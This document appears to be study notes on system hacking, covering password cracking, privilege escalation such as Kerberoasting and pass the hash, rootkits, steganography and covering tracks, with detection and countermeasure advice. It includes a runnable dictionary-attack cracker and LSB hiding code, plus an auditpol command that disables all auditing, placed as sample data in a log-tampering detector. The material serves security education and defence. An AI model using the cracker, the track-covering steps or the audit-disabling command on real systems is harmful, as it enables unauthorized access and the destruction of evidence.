System Hacking


rtsort

A rainbow table is an array of rainbow chains. Each rainbow chain has a start point and an end point. The rtsort program sorts the rainbow chains by end point so that a binary search is possible during lookup. Run rtsort . (the command, a space, then a period) to sort all .rt rainbow tables in the current directory; the period is the argument that names the current directory, so the space before it matters.

hash_algorithm

A rainbow table is specific to one hash algorithm: a table built for a certain algorithm helps to crack only hashes of that type. The rtgen program natively supports many hash algorithms, including lm, ntlm, md5, sha1, mysqlsha1, halflmchall, ntlmchall, oracle-SYSTEM, and md5-half. The rtgen example in this set generates md5 rainbow tables, which speed up the cracking of md5 hashes and nothing else.

Rootkits

A rootkit is software an attacker uses to establish and keep root- or admin-level privileges on a system. Rootkits are a set of programs designed to access a system covertly and let the attacker control its functions. With a rootkit, an attacker can hide added applications and processes, obtain sensitive data, and set up the system to act as a server for bot updates. Rootkits can modify the operating system and the utilities of the target system, which is how they stay hidden from the tools an administrator would normally use to look for them. A rootkit package typically bundles packet sniffers, log-cleaning utilities, DDoS programs, IRC bots, and backdoor programs. Two rootkits described in this set are GrayFish and Sirefef.

GrayFish

A rootkit that runs within the Windows operating system. It contains hidden storage and has invisible command execution. GrayFish isn't flagged by anti-rootkit scans because it sets no hooks on Windows kernel functions and doesn't register callback functions, which are the two things such scanners usually look for.

C++ sourcecode steganography

Data (in the course material, a set of tools) is hidden inside C++ source code, where it passes for ordinary program text.

StegoStick

A steganography tool that allows a file to be hidden within any image, audio, or video file, even in PDFs and EXE files.

OPH Crack

Ophcrack (written here as OPH Crack) is a tool for cracking Windows login passwords. It uses rainbow tables and can crack hashes in many formats, including LM and NTLM. It is open source and free to download.

OpenStego

A tool for hiding data in a cover file and for watermarking files; the watermark can be used to trace file copying.

DeepSound

A tool for hiding data in audio files and extracting files from audio tracks. It also has the option to encrypt the files.

Disable Auditing

After gaining administrative access to a system, an attacker will typically install reconnaissance tools such as keyloggers to obtain logins and passwords. Installing them leaves traces in the Windows event log, or in syslog on Linux and other systems, and those logs can be configured to alert administrators. To disable auditing, an attacker can use the Auditpol.exe command line utility to change the audit policy on the local system or, with the right credentials, on a remote one, and then enable auditing again once the attack is over so that the silence in the log attracts less attention. Auditpol.exe changes the audit settings per category and subcategory of security events (logon, object access, policy change, and so on). Changing the policy is itself an audited event while policy-change auditing is still on, which is why defenders watch for it.

Modify Timestamps

Another method of covering tracks is to alter file timestamps. Each file is stamped with a time and date when it is created, accessed, or modified, and an attacker changes these so the file blends in with its surroundings. Tools that can do this: Timestomp, touch, ctime, Meterpreter.

NTFS Data Streaming

Another way that attackers hide programs is through NTFS alternate data streams (ADS). Every NTFS file has an unnamed default data stream (the content you see when you open the file); NTFS also lets a file carry any number of additional named streams, each of arbitrary size. Because these streams do not appear in Windows Explorer or in a plain directory listing, an attacker can store malicious code in an alternate stream and execute it from there without the user or the system administrator noticing. On Windows Vista and later, dir /r shows the streams attached to each file, and PowerShell's Get-Item -Stream * does the same. To get rid of a malicious alternate data stream, move the file to a partition or device formatted with FAT: FAT has no concept of alternate streams, so only the default stream survives the move. Keep your antivirus software updated. Tools that detect and remove infected ADS include LADS, Stream Detector, LNS, and Forensic Toolkit.
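The check described above, as an added example that is not part of the course material or of any tool named in it: a small Python parser for the output of dir /r that lists every named stream and flags the ones that are neither the default stream nor the browser's Zone.Identifier mark-of-the-web. The listing it parses is constructed for the demo; on a real host you would run dir /r /s on the directory of interest and feed the saved output to suspicious_streams().

```python
"""Detect alternate data streams in the output of "dir /r".

Added example (not from the course or from LADS, LNS, or Stream Detector).
It parses a constructed "dir /r" listing and flags every stream except the
default data stream and the Zone.Identifier mark-of-the-web stream.
"""
import re
from typing import Iterator, NamedTuple


class Stream(NamedTuple):
    directory: str
    file: str
    stream: str
    size: int


# "dir" prints a "Directory of <path>" header before each directory's entries.
DIR_RE = re.compile(r"^\s*Directory of (.+?)\s*$")
# "dir /r" prints each named stream on its own line: size, then file:stream:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")
# Streams that are expected on files downloaded with a browser.
BENIGN_STREAMS = {"Zone.Identifier"}

# Constructed sample output; names and sizes are made up for the demo.
SAMPLE_DIR_R = r"""
 Volume in drive C has no label.
 Volume Serial Number is 1A2B-3C4D

 Directory of C:\Users\alice\Downloads

03/14/2023  10:22 AM    <DIR>          .
03/14/2023  10:22 AM    <DIR>          ..
03/14/2023  10:20 AM            12,288 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
03/14/2023  10:21 AM             2,048 notes.txt
                                73,802 notes.txt:payload.exe:$DATA
               2 File(s)         14,336 bytes
"""


def parse_dir_r(output: str) -> Iterator[Stream]:
    """Yield every named stream in a "dir /r" listing together with its directory."""
    directory = ""
    for line in output.splitlines():
        m = DIR_RE.match(line)
        if m:
            directory = m.group(1)
            continue
        m = STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            yield Stream(directory, m.group(2), m.group(3), size)


def suspicious_streams(output: str) -> list[Stream]:
    """Return the streams that are neither the default stream nor known-benign."""
    return [s for s in parse_dir_r(output) if s.stream not in BENIGN_STREAMS]


if __name__ == "__main__":
    for s in suspicious_streams(SAMPLE_DIR_R):
        print(f"{s.directory}\\{s.file}:{s.stream}  ({s.size} bytes)")
```

A 73 KB stream named like an executable behind a 2 KB text file is exactly the pattern the text describes. Once found, the stream can be removed with PowerShell's Remove-Item -Stream, or by moving the file to a FAT volume as the text suggests.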

Hide Evidence

Another way to cover tracks is to hide the evidence. Methods an attacker can use to hide files:
Setting the hidden attribute on a file removes it from normal directory listings and from browsing in Windows Explorer, unless the user has chosen to show hidden files.
Placing a period at the beginning of a file name hides it from ordinary listings on Linux, Unix, and OS X.
Placing data in the slack space of an existing file, that is, the unused space between the end of the file's data and the end of its last allocated cluster. Because the file's recorded size does not change, nothing indicates that data was added, and the data does not show up when the file is opened.
Storing the file in an alternate data stream (ADS). ADS was introduced for compatibility with Macintosh files, which carry multiple forks; one of its features is that a file can hold several streams of data at once, and the alternate streams are not shown in Windows Explorer.
Using executables that are launched from the command line but show no window, so the attacker can run programs without the user seeing them.

Writable services

Another way to exploit a service is to look for services that run under admin-level (or SYSTEM) accounts and whose configuration or binary is writable by lower-privileged users. Such weak permissions let anyone change what the service executes, so the attacker can point it at their own program and have it run with the service account's rights, for example to create a new local administrator account that gives them everything the admin account can do.

To prevent rootkits, take the following steps:

Back up critical data and reinstall the OS and applications.
Install and routinely update firewalls.
Patch and regularly update the OS and applications.
Keep a record of automated installation procedures.
Harden servers and network stations.
Train users to confirm that downloads are from a trusted source.
Check for rootkits through a kernel memory dump analysis.

Ccleaner

CCleaner is a cleaning tool that removes files and clears internet browsing history, freeing up hard disk space in the process. It clears temporary files, history, and cookies from each of the six major web browsers.

There are additional tools available to help cover tracks:

Ccleaner, Clear My History, Dump event log

Image

Check for changes in format, size, the color palette, and the last modified timestamp.

Text

Check for extra spaces and invisible characters. Look for unusual patterns in spacing, fonts, line heights, and even in the language.

Clear My History

Clear My History is software that can clear cookies, stored data like passwords, browser history, and temporary cached files. It can clear the recycling bin, clipboard data, and recent documents lists as well.

Crackers

Crackers are software programs that crack codes and passwords to gain unauthorized access to a system. Many methods and tools exist for this, such as dictionary, brute force, and rainbow attacks; the ones covered in this set are described under Technical Password Attacks.

Cross view-based detection

Cross view-based detection enumerates files, processes, and registry keys by a low-level route (reading raw disk or kernel structures) and compares the result with what the operating system's high-level APIs report. A rootkit that hides objects from the APIs shows up as a discrepancy between the two views.

DLL hijacking

DLL hijacking exploits the order in which Windows looks for a DLL that an application loads by name rather than by fully qualified path: the directory the application was loaded from is searched before the system directories. If an attacker can place a malicious DLL with the expected name in that directory ahead of time, for example in the folder an installer is run from, the application loads the attacker's DLL instead of the legitimate one, and the code runs with the application's privileges.

Spam/emailsteganography

Data is embedded in an email.

Clear text credentials in LDAP

Credentials transmitted unencrypted, in clear text, can be captured by anyone who can sniff the network. Be aware that by default most domain controllers still accept simple LDAP binds, in which the user name and password travel in clear text, even from applications on the local network. You can find which accounts are doing this with the unsecure LDAP bind PowerShell script, which reads the domain controller's Directory Service event log (unsigned and simple binds are recorded there once LDAP interface event logging is turned up). The script writes a CSV file listing the accounts and source addresses that bound insecurely; those are the ones to fix before enforcing LDAP signing or LDAPS.

The following tools aid in steganography detection:

Discover the Hidden, StegoHunt, Gargoyle, StegAlyzerSS, Virtual Steganographic Laboratory (VSL), Stegdetect

Non-Technical Password Attacks

Dumpster diving, Social engineering, Shoulder surfing

ERD Commander

ERD Commander is a recovery environment originally built for Windows NT that boots a system that no longer starts, for example after a bad software installation. It gives the user a command prompt and tools for basic maintenance tasks during the boot process, including resetting local account passwords (its Locksmith tool), which is why it also appears in this set among the privilege escalation tools.

Videosteganography

Files of any type can be hidden inside video files such as .MP4, .AVI, and .WMV.

Privilege Escalation Techniques

Hackers can escalate privileges in the following ways: cPassword, clear text credentials in LDAP, Kerberoasting, credentials in LSASS, the SAM database, unattended installation, DLL hijacking.

How can hackers maintain access?

Hackers like to keep access to the systems on which they have gained admin or root access, and they work hard to keep other hackers out. At the admin or root level they can download or upload anything, capture and manipulate data, configure applications and services, and use the system to exploit other systems. A few ways a hacker can maintain access: path interception, writable services, unsecure file and folder permissions.

Heuristic or behavior-based detection

Heuristic or behavior-based detection looks for deviations from the normal behavior and patterns of the operating system. One of the patterns it looks for is execution path hooking, in which a function pointer or table entry that is accessible to the attacker (an import table, a system call table, or similar) is redirected so that a different routine runs than the one intended. Rootkits rely on this behavior.

Credentials in LSASS

In Microsoft Windows, the Local Security Authority Subsystem Service (LSASS, the lsass.exe process) enforces the system's security policy: it verifies user logons, creates access tokens, and handles password changes. It is a critical component of domain authentication, of Active Directory operations on a domain controller, and of the initial security authentication procedure. Because it holds credential material for logged-on users in memory (NTLM hashes, Kerberos tickets, and in older configurations plain text passwords), an attacker who can read its memory, or who can tamper with it through malware such as a virus or Trojan horse, can easily escalate privileges across the network.

Brute force

A brute force attack tries every possible combination of characters, one candidate password at a time, until the correct one is found; given enough time, every password is found this way. The disadvantages are that it needs a large amount of processing power and that the time required grows exponentially with the length of the password.

Dictionary

In a dictionary attack, word lists, often taken straight from dictionaries, are hashed and compared against the stored password hashes. Besides standard dictionary words, these lists usually include variations that are common in passwords, such as pa$$word, and simple keyboard finger rolls like qwert1234. The downside of this attack is that it can still take a long time, and it only finds passwords that appear in the list or are produced by its variation rules. Two common tools for dictionary attacks are Brutus and Hydra.
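The attack described above as an added, runnable example; this is not code from Brutus or Hydra. It applies a handful of variation rules (case changes, leet substitutions, common suffixes) to a short word list and tests each candidate against a set of unsalted MD5 hashes. The word list, the rules, and the target hashes are constructed inside the block so that the demo is self-checking; in practice the hashes come from a SAM dump or a leaked database and the list from a file such as rockyou.txt.

```python
"""Dictionary attack with mangling rules against unsalted MD5 hashes.

Added example, not code from Brutus or Hydra. Everything below (word list,
rules, targets) is constructed for the demo.
"""
import hashlib
from collections.abc import Callable, Iterable, Iterator

WORDLIST = ["password", "summer", "qwerty", "letmein", "dragon"]

LEET = str.maketrans("aeios", "@310$")

# Rules that turn one dictionary word into the variants people actually use.
RULES: list[Callable[[str], str]] = [
    lambda w: w,                         # as is
    str.capitalize,                      # Summer
    str.upper,                           # SUMMER
    lambda w: w.replace("s", "$"),       # pa$$word
    lambda w: w.translate(LEET),         # p@$$w0rd
]
SUFFIXES = ["", "1", "123", "1234", "!", "2023", "2023!"]

# Constructed targets: four weak passwords and one that no rule produces.
_SECRETS = ["Summer2023!", "pa$$word", "letmein", "qwerty1234", "correct horse battery"]
TARGET_HASHES = {hashlib.md5(s.encode()).hexdigest() for s in _SECRETS}


def mangle(word: str) -> Iterator[str]:
    """Yield every variant of a word under RULES x SUFFIXES, without duplicates."""
    seen = set()
    for rule in RULES:
        for suffix in SUFFIXES:
            candidate = rule(word) + suffix
            if candidate not in seen:
                seen.add(candidate)
                yield candidate


def dictionary_attack(hashes: Iterable[str], wordlist: Iterable[str],
                      hash_name: str = "md5") -> tuple[dict[str, str], int]:
    """Return {hash: password} for every hash cracked, plus the number of candidates tried."""
    remaining = set(hashes)
    cracked: dict[str, str] = {}
    tried = 0
    for word in wordlist:
        for candidate in mangle(word):
            tried += 1
            digest = hashlib.new(hash_name, candidate.encode()).hexdigest()
            if digest in remaining:
                cracked[digest] = candidate
                remaining.discard(digest)
                if not remaining:           # stop early once everything is cracked
                    return cracked, tried
    return cracked, tried


if __name__ == "__main__":
    found, tried = dictionary_attack(TARGET_HASHES, WORDLIST)
    print(f"cracked {len(found)} of {len(TARGET_HASHES)} hashes after {tried} candidates")
    for digest, password in found.items():
        print(f"  {digest}  {password}")
```

Four of the five hashes fall to five words and five rules, which is the point of the text: the cost is a few hundred hash computations, not the astronomical search a brute force attack would need. The fifth password is a multi-word passphrase that no rule in the list produces, which is why the loop runs to the end of the word list without cracking it.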

Integrity-based detection

Integrity-based detection works by running a tool to scan a clean system to create a database. The integrity-based detection scans the system and compares the current scan to the clean database. Any dissimilarities between the clean baseline database and the current scan are flagged and a notification is sent.

Several methods used to detect and identify rootkits include:

Integrity-based detection, Signature-based detection, Heuristic or behavior-based detection, Runtime execution path profiling, Cross view-based detection

Kerberoasting

Kerberos is a protocol for authenticating over an insecure network using tickets. A user first obtains a ticket-granting ticket (TGT) from the key distribution center (KDC). To reach a service, the user presents the TGT and asks the ticket-granting service (TGS) for a service ticket for that service's service principal name (SPN). The KDC returns a service ticket encrypted with a key derived from the service account's password (with RC4 encryption, directly with the account's NTLM hash). Any authenticated domain user can request such tickets for any SPN, so an attacker collects tickets for SPNs tied to user accounts and cracks them offline with a brute force or dictionary attack; a successful crack reveals the service account's password in plain text. This process is called Kerberoasting. It needs no elevated privileges and is easy to perform, and the risk of detection is low because the requests look like ordinary ticket traffic; it is not zero, however, since service ticket requests are logged (event 4769) and a burst of RC4-encrypted requests from one user is a known indicator.

Keylogger

Keystrokes on the computer keyboard are logged or recorded to obtain passwords and other important data. This can be done with either hardware devices or software programs, on an individual computer or across a whole network. The user typically cannot detect keylogger software, and the keystrokes are captured before anything is encrypted. A hardware keylogger is a physical device that looks like a regular USB drive and is installed between the keyboard plug and a USB port. Every keystroke is stored on the device, and the attacker has to retrieve it to get the data. The advantage of this type is that desktop security software, antispyware, and antivirus programs cannot see it; the disadvantage is that it is easy to find because it is physically plugged into the computer. Software keyloggers are installed through an opened email attachment or remotely over a network. Their advantage is that they have no memory limitation, because the data is sent to and stored on a remote computer. Tools include PC Activity Monitor, RemoteSpy, Veriato Investigator, and KeyStrokeSpy.

Audio

Look for distortions and patterns in frequencies that are above or below the human range of hearing.

Meterpreter

Meterpreter is Metasploit's post-exploitation payload. It runs entirely in the memory of the compromised process, leaving nothing on disk, and has many features for covering tracks, including timestomp for changing file timestamps and clearev for clearing the Windows event logs.

Unsecure file and folder permissions

Weak permissions on files and folders, for example a directory that any user can write to but that a service or a privileged process loads code from, let a low-privileged user plant or replace files that a higher-privileged process will execute. Older versions of Windows were particularly lax about this. It is the same condition that makes DLL hijacking and malicious file installation possible against a targeted non-admin user.

OmniHide Pro

OmniHide Pro can hide files in photos, movies, documents, and music. It allows the user to create a password to make the hidden file more secure.

Pass the hash

Pass the hash is a technique in which an attacker uses the NTLM hash of a user's password to authenticate to a server without ever knowing the plain text password: NTLM authentication proves possession of the hash, not of the password, so the hash is all that is needed. Pass the hash is dangerous to an organization because once an attacker has a foothold, the whole organization can be compromised very quickly. First, the attacker gains access to an individual computer through malware or another technique. Then the attacker reads the system's memory (LSASS) and finds the stored hashes of other users who have logged on to that workstation. Those hashes are used to reach other workstations in the network, each of which is searched for more hashes, until a hash turns up that belongs to a high-level administrator account. At that point the attacker has access to the entire network as an administrator.

Rainbow

Rainbow attacks are like dictionary attacks, but instead of hashing a word list at attack time they use tables precomputed from the plain text space and its hashes, which makes lookups much faster than a dictionary or brute force attack. When a plain text password is stored, it is passed through a one-way hash function. A reduction function then maps a hash back into some plain text of the allowed charset and length; this new plain text is not the one that was originally hashed, just another candidate. Alternating hash and reduction many times produces a chain. A rainbow table stores only the start plain text and the end point of each chain, so the intermediate values cost no storage and are recomputed on demand. To crack a hash, the attacker reduces it, walks forward to a chain end point, and looks that end point up in the table; if it is found, the chain is regenerated from its start point until the plain text that produced the target hash appears. The rainbow table gets its name from using a different reduction function in each column of the chain, which limits the chain merges that plagued earlier precomputation tables.

RainbowCrack

RainbowCrack is software that cracks hashes by rainbow table lookup. The rtgen program generates rainbow tables, and the rtsort program sorts them; both are described in this set.

Runtime execution path profiling

Runtime execution path profiling checks for variations in the runtime execution path of all executable files and system processes.

SAM database

Security Account Manager (SAM) is the database in which Windows stores local user passwords as LM or NTLM hashes. It is used to authenticate local users and, for local accounts, remote logons to that machine. It does not hold domain user credentials (those live in Active Directory on the domain controllers); it holds the machine's local accounts, including the built-in administrator and recovery accounts. The SAM file is locked by the kernel while Windows is running, so it cannot simply be copied, but it can be read from a volume shadow copy or saved through the registry, and the hashes can be dumped and taken offsite, where they are cracked by brute force or dictionary attack, or used directly in a pass the hash attack.

Signature-based detection

Signature-based detection scans a system's processes and executable files looking for byte sequences of known malicious rootkit programs.

Sirefef

Sirefef, also known as ZeroAccess, has virus, Trojan horse, and rootkit components. As a rootkit, it is unseen by antivirus and anti-spyware programs. It hides by changing the internal process of the target operating system. Sirefef is difficult to remove and can create problems with Windows Firewall and Defender Service, remote hosts, and browser settings. It creates a folder to store additional malware.

Sniffing

Sniffing is a passive way to obtain account credentials. The sniffer collects data in transit on a LAN; once an attacker has a foothold on one system in the LAN, traffic to and from other systems can be collected as well, depending on how the network is switched. The sniffer runs in the background, so the victim is not aware of it. Sniffing tools include Wireshark and tcpdump; Recon-ng, which is sometimes listed alongside them, is a web reconnaissance framework rather than a packet sniffer.

Spam Mimic

Spam Mimic encodes data into emails and has the ability to decode the messages.

Spyware

Spyware is malware that covertly captures information and sends it to an attacker, who uses it to gain access. Spyware may log keystrokes, track activity, capture screens, or record file operations. It is often installed unintentionally by a user through normal web activity and usually goes undetected. Attackers may install backdoors into the system to maintain access to the spyware.

Steganography

Steganography is the method of embedding data into legitimate files such as graphics, banner ads, or plain text messages to hide it, and extracting the data once it reaches its destination. It is very difficult to detect and has become a popular method for attackers. Steganography can hide identities, communication, code, and content. Attackers may use it instead of encryption, since the goal is to conceal that a message exists at all and the hidden data does not have to be encrypted; hidden data that is also encrypted is harder still to recover. The following types of steganography are described in this set: image steganography, video steganography, document or whitespace steganography, audio steganography, web steganography, C++ source code steganography, spam/email steganography.

The following table lists tools used to create steganography.

StegoStick, OpenStego, OmniHide Pro, DeepSound, Spam Mimic

Erase or Modify Evidence

System log files are the first place to check for questionable activity. Typically attackers erase only the entries that show their actions, so that the log looks as much as possible like it did before the attack. On Windows this requires administrative privileges, and clearing a log writes its own event, so an attacker who clears the Security log leaves an audit-log-cleared record behind. Attackers commonly target the following Windows logs (the legacy file names from Windows NT/2000/XP; on Vista and later they are Security.evtx, System.evtx, and Application.evtx):
SECEVENT.EVT, the Security log, records failed logons and unauthorized file access.
SYSEVENT.EVT, the System log, records anomalies in system operation and driver failures.
APPEVENT.EVT, the Application log, records application events.
These files are continuously open and being written to. A careful attacker also removes any files added during the intrusion and the entries generated by the attack.
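The defender's side of this card and of Disable Auditing, as an added example (detection logic written for this set, not course material): the audit-policy change that Auditpol.exe makes and the clearing of a log both leave their own events, and the small rule set below flags them in a stream of event records. The records are constructed JSON lines in the shape a log forwarder produces from the Security and System channels; the field names are an assumption that matches common collectors, not any vendor's schema, and the auditpol command line in the sample is the form an attacker following the text would run.

```python
"""Spot log clearing and audit-policy tampering in Windows event records.

Added example, not from the course. Rules key on the events Windows writes
when someone clears a log (Security 1102, System 104), changes the audit
policy with auditpol or Group Policy (4719), or runs auditpol with a
disable switch (4688 process creation, with command-line logging on).
"""
import json
from typing import Iterable

# (channel, event id) -> description
RULES = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "System or Application event log cleared",
    ("Security", 4719): "System audit policy changed",
}

# Constructed sample: a normal logon, a benign process start, then the
# tampering sequence described in the text. Field names are assumptions.
SAMPLE_EVENTS = """
{"TimeCreated": "2023-03-14T10:20:01Z", "Channel": "Security", "EventID": 4624, "SubjectUserName": "alice", "LogonType": 2}
{"TimeCreated": "2023-03-14T10:21:09Z", "Channel": "Security", "EventID": 4688, "SubjectUserName": "alice", "CommandLine": "notepad.exe notes.txt"}
{"TimeCreated": "2023-03-14T10:25:44Z", "Channel": "Security", "EventID": 4688, "SubjectUserName": "alice", "CommandLine": "auditpol.exe /set /category:* /success:disable /failure:disable"}
{"TimeCreated": "2023-03-14T10:25:45Z", "Channel": "Security", "EventID": 4719, "SubjectUserName": "alice", "AuditPolicyChanges": "Success removed, Failure removed"}
{"TimeCreated": "2023-03-14T10:31:02Z", "Channel": "Security", "EventID": 1102, "SubjectUserName": "alice"}
{"TimeCreated": "2023-03-14T10:31:03Z", "Channel": "System", "EventID": 104, "SubjectUserName": "alice", "LogName": "Application"}
"""


def load_events(text: str) -> list[dict]:
    """Parse JSON lines into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: Iterable[dict]) -> list[tuple[str, str, str]]:
    """Return (time, rule, user) for every record that indicates track covering."""
    alerts = []
    for e in events:
        key = (e.get("Channel"), e.get("EventID"))
        user = e.get("SubjectUserName", "?")
        if key in RULES:
            alerts.append((e["TimeCreated"], RULES[key], user))
        elif key == ("Security", 4688):
            cmd = e.get("CommandLine", "").lower()
            if "auditpol" in cmd and "/set" in cmd and "disable" in cmd:
                alerts.append((e["TimeCreated"], "auditpol used to disable auditing", user))
    return alerts


if __name__ == "__main__":
    for when, rule, user in detect(load_events(SAMPLE_EVENTS)):
        print(f"{when}  {rule}  (by {user})")
```

The 1102 and 104 rules fire even when the attacker disabled auditing first, because Windows records a log clear regardless of the audit policy; that is the record the text says an attacker cannot avoid leaving. In production these alerts should be forwarded off the host as they occur, since an attacker with local admin rights can clear whatever is still on the machine.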

While it is difficult to detect steganography, there are some actions you can take. The table below identifies where to look for steganography files.

Text, Image, Audio, Video

charset

The charset is the set of characters the plain texts are drawn from. loweralpha-numeric stands for abcdefghijklmnopqrstuvwxyz0123456789; the charsets rtgen accepts are defined in the configuration file charset.txt.

Websteganography

The data is hidden behind a web object when uploaded to the server.

Audiosteganography

The data is hidden in a digital sound file through least significant bit (LSB) manipulation: the lowest bit of each sample is overwritten with one bit of the message, which changes the sound by less than the ear can notice.

Document or whitespacesteganography

The data is hidden in added white spaces and tabs at the end of lines.

Dump event log

The dump event log command line tool (dumpel.exe, from the Windows 2000 Resource Kit) dumps an event log from the local or a remote system into a tab-separated text file, optionally filtered to specific event types.

Tools

The following tools can be used to elevate privileges: Trinity Rescue Kit, ERD Commander, OPH Crack.

What are other ways hackers maintain access?

The following additional ways a hacker can establish continued access to the systems they hack are described in this set: backdoors, crackers, spyware, scheduled tasks.

Imagesteganography

The most common form of steganography is hiding information in image files.
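The LSB technique behind both image and audio steganography, as an added example that is not from any tool named in this set. It works on a bytes object of 8-bit samples, which is what an uncompressed grayscale image or 8-bit PCM audio looks like once the file header is stripped, so the same code covers both cards. The cover is a constructed gradient; a real carrier would be read from a BMP or WAV file, and the header written back unchanged.

```python
"""Least-significant-bit steganography on a raw sample buffer.

Added example, not from StegoStick, OpenStego, or DeepSound. Each byte of
the cover is an 8-bit pixel or audio sample; one message bit goes into the
LSB of each sample, preceded by a 4-byte length so extraction knows where
to stop.
"""


def capacity(cover: bytes) -> int:
    """Bytes of message that fit: one bit per sample, minus the 4-byte length prefix."""
    return len(cover) // 8 - 4


def embed(cover: bytes, message: bytes) -> bytes:
    """Write len(message) (4 bytes, big-endian) then message into the LSB of each sample."""
    if len(message) > capacity(cover):
        raise ValueError("message does not fit in cover")
    payload = len(message).to_bytes(4, "big") + message
    out = bytearray(cover)
    i = 0
    for byte in payload:
        for shift in range(7, -1, -1):
            out[i] = (out[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return bytes(out)


def _read_bits(samples: bytes, start: int, count: int) -> int:
    value = 0
    for i in range(start, start + count):
        value = (value << 1) | (samples[i] & 1)
    return value


def extract(stego: bytes) -> bytes:
    """Reverse embed(): read the length prefix, then that many bytes."""
    length = _read_bits(stego, 0, 32)
    return bytes(_read_bits(stego, 32 + 8 * k, 8) for k in range(length))


def max_sample_change(cover: bytes, stego: bytes) -> int:
    """How far any sample moved; LSB embedding never changes a sample by more than 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed 64x64 "image": a smooth gradient with no real content.
COVER = bytes((x * 3 + y * 2) % 256 for y in range(64) for x in range(64))
SECRET = b"meet at 0900, bring the key"

if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    print("capacity:", capacity(COVER), "bytes")
    print("recovered:", extract(stego))
    print("largest sample change:", max_sample_change(COVER, stego))
```

The carrier keeps its exact size and format and no sample moves by more than one level, which is why the detection advice in this set is to look for statistical oddities in the LSB plane rather than for visible changes. Lossy formats (JPEG, MP3) re-quantize samples and destroy the LSBs, so this form of hiding only survives in uncompressed or losslessly compressed carriers.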

Countermeasures

The most effective way to protect against privilege escalation is to tighten privileges so that users have only the privileges they need. This prevents escalation if an attacker gains access to an account that has higher privileges than it needs. Once privileges are tightened, focus on these steps:
Encrypt sensitive information.
Implement multi-factor authentication and authorization.
Restrict interactive logon privileges.
Scan the operating system and application code regularly for bugs and errors.
Frequently update the operating system and applications.
Install auditing tools to continuously monitor file system permissions.
Use fully qualified paths in Windows applications.
Select Always Notify in the UAC settings.

chain_num

The number of rainbow chains to generate. A rainbow table is simply an array of rainbow chains. The size of each rainbow chain is 16 bytes.

chain_len

The rainbow chain length, that is, the number of hash/reduce links per chain. A longer chain covers more plain texts per chain for the same storage, but takes longer to generate and longer to walk during a lookup.

Social engineering

The social engineering attack relies on human error. The hacker convinces an employee or other authorized person to give him a password.

table_index

The table_index parameter selects the reduction function. Rainbow tables with a different table_index parameter use different reduction functions.

Touch

The touch command on Linux, Unix, and OS X can also be used to alter timestamps. By default it sets a file's access and modification times to the current time; with -t or -d it sets them to any specific time, and with -r it copies the times of another file. It cannot set the inode change time (ctime), which the kernel updates to the current time whenever metadata changes, including when touch itself runs.

Cover Tracks

There are many ways to clear online tracks:
Browse in private mode.
Delete the history in the address field and the stored history.
Clear cookies and caches.
Delete downloads, saved sessions, and user JavaScript.
Disable the password manager and clear its data.
Create multiple users.
Clear Most Recently Used and toolbar data.

Password Cracking Countermeasures

There are several things you can do to counter password cracking attempts:
Salt passwords. A salt is random data added to the password before it is hashed, and stored alongside the hash. Since the hash function is one-way, the stored value cannot be turned back into the password, and the salt means a precomputed table (such as a rainbow table) would have to be rebuilt for every salt value, so precomputation no longer pays off.
The more complex a password, the harder it is to crack. Use at least 8 to 12 characters combining numbers, uppercase and lowercase letters, and special symbols; longer passphrases are better still.
Never share your passwords.
If asked to change your password, do not reuse your current one.
Never use a dictionary word as your password.
Change your passwords every 30 days.
Never store a password in an unsecure location.
Never use a default password.
Never send passwords over a protocol with weak encryption or in clear text.
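The salting countermeasure, as an added example written for this set rather than taken from it: the same password is stored for three users first as unsalted MD5 and then salted with PBKDF2-HMAC-SHA256, and a word-list attack is run against both so the difference in work is visible. The iteration count is deliberately low so the demo runs quickly; production deployments use a far higher count, or a memory-hard function such as Argon2.

```python
"""Why salting (plus a slow hash) defeats precomputed and shared-work attacks.

Added example, not from the course. ITERATIONS is a demo value; real
deployments use hundreds of thousands of iterations or Argon2/scrypt.
"""
import hashlib
import hmac
import os
from typing import Optional

WORDLIST = ["123456", "password", "summer", "qwerty", "letmein"]
ITERATIONS = 20_000   # demo value, too low for production


def store_unsalted(password: str) -> str:
    """The weak scheme: a bare, fast, unsalted hash."""
    return hashlib.md5(password.encode()).hexdigest()


def store_salted(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$hash' with a fresh 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def lookup_attack(stored: list[str], wordlist: list[str]) -> tuple[dict[str, str], int]:
    """Unsalted: hash the word list once (a tiny lookup table), match every stored hash."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: table[h] for h in stored if h in table}, len(wordlist)


def salted_attack(stored: list[str], wordlist: list[str]) -> tuple[dict[str, str], int]:
    """Salted: nothing can be precomputed or shared, so every hash costs its own pass."""
    cracked, work = {}, 0
    for s in stored:
        for w in wordlist:
            work += 1
            if verify_salted(w, s):
                cracked[s] = w
                break
    return cracked, work


def demo(password: str = "summer", users: int = 3) -> dict:
    """Store one weak password for several users both ways and attack both."""
    unsalted = [store_unsalted(password) for _ in range(users)]
    salted = [store_salted(password) for _ in range(users)]
    _, work_unsalted = lookup_attack(unsalted, WORDLIST)
    _, work_salted = salted_attack(salted, WORDLIST)
    return {
        "unsalted_identical": len(set(unsalted)) == 1,   # same hash for every user
        "salted_identical": len(set(salted)) == 1,       # a different hash per user
        "work_unsalted": work_unsalted,                  # one pass serves all users
        "work_salted": work_salted,                      # a pass per user, each slow
    }
```

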